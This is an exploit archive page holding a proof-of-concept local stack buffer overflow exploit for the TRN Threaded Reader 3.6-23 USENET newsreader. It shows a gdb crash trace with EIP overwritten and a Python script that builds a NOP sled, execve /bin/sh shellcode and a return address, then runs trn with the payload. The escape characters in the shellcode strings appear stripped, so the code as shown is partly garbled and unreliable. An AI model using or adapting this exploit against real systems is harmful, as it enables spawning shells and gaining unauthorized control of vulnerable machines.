Home / exploitsPDF  

TRN Threaded Reader 3.6-23 Stack Buffer Overflow

Posted on 30 November -0001

<HTML><HEAD><TITLE>TRN Threaded Reader 3.6-23 Stack Buffer Overflow</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit developed using Exploit Pack v5.4 # Exploit Author: Juan Sacco - http://www.exploitpack.com - <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="6309100200000c23061b130f0c0a17130200084d000c0e">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> # Program affected: Threaded USENET news reader # Version: 3.6-23 # # Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org # Program description: Threaded USENET news reader, based on rn # trn is the most widely-used newsreader on USENET # Kali Linux 2.0 package: pool/non-free/t/trn/trn_3.6-23_i386.deb # MD5sum: 57782e66c4bf127af0d252db9439fbdf # Website: https://sourceforge.net/projects/trn/ # # gdb$ run $(python -c 'print "A"*156+"DCBA"') # Starting program: /usr/bin/trn $(python -c 'print "A"*156+"DCBA"') # # Program received signal SIGSEGV, Segmentation fault. # --------------------------------------------------------------------------[regs] # EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c # ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344 # CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: # Cannot access memory at address 0x41424344 # 0x41424344 in ?? () ''' import os, subprocess def run(): try: print "# TRN Threaded Reader - Stack Buffer Overflow by Juan Sacco" print "# This Exploit has been developed using Exploit Pack" # NOPSLED + SHELLCODE + EIP buffersize = 160 nopsled = "x90"*132 shellcode = "x31xc0x50x68//shx68/binx89xe3x50x53x89xe1x99xb0x0bxcdx80" eip = "xd0xecxffxbf" buffer = nopsled * (buffersize-len(shellcode)) + eip subprocess.call(["trn ",' ', buffer]) except OSError as e: if e.errno == os.errno.ENOENT: print "Sorry, Threaded Reader - Not found!" else: print "Error executing exploit" raise def howtousage(): print "Snap! Something went wrong" sys.exit(-1) if __name__ == '__main__': try: print "Exploit TRN 3.6-23 Local Overflow Exploit" print "Author: Juan Sacco - Exploit Pack" except IndexError: howtousage() run() </BODY></HTML>

 

TOP